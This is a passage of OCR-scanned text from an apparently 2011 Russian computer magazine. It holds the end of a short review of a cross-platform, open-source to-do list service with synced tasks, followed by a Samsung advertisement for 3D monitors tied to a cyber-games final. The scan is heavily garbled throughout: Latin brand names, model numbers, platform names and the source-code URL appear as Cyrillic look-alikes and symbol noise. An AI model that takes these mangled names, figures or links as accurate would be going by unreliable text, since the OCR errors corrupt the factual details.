ления списка дел. Что мне нравится в \\ипдегИ<{, так это глобальная 
кроссплатформенность. Сейчас доступны веб-интерфейс, полноцен- 
ные клиенты для \\Лпдо\/$ и Мас 05 Х, атакже мобильных платформ 
Апагога и РБопе/Рад. Все задачи из списка ТООО0 всегда засинхро- 
низированы: если ты добавил что-то стелефона, то это тут же отобра- 
зится в веб-интерфейсе. Мало этого, \Мип4ег(!${ предлагает работать 
над списками дел совместно, поэтому это еще и простейшая система 
управления проектами. Сервис не только бесплатный, ноеще и откры- 
тый (исходники доступны на а(ВуБ. согп/6умипдегктпаег). Примечатель- 
но, что продукт написан на платформе Т{Цапииг. 
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Новая глубина ощущений 
с «Я =7-мониторами 5затзипо. 


ИА МСС 


\М овкгр СУВЕВ САМЕЗ 


Официальный монитор Российского 
Финала Киберигр \\/С@ 2011 


Активные 30-очки 


входят в комплект поставки $23А7000 $23А7500 $27А9500 


Т23А750” Т27А950” 
Развертка 120 Гц * Реалистичное ЗО-изображение ® Конвертация 20 в ЗО “При использовании 30-очков. "Модель с ТВ-тюнером. 


Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). ммим.затзипд.сот Товар сертифицирован. Реклама. 


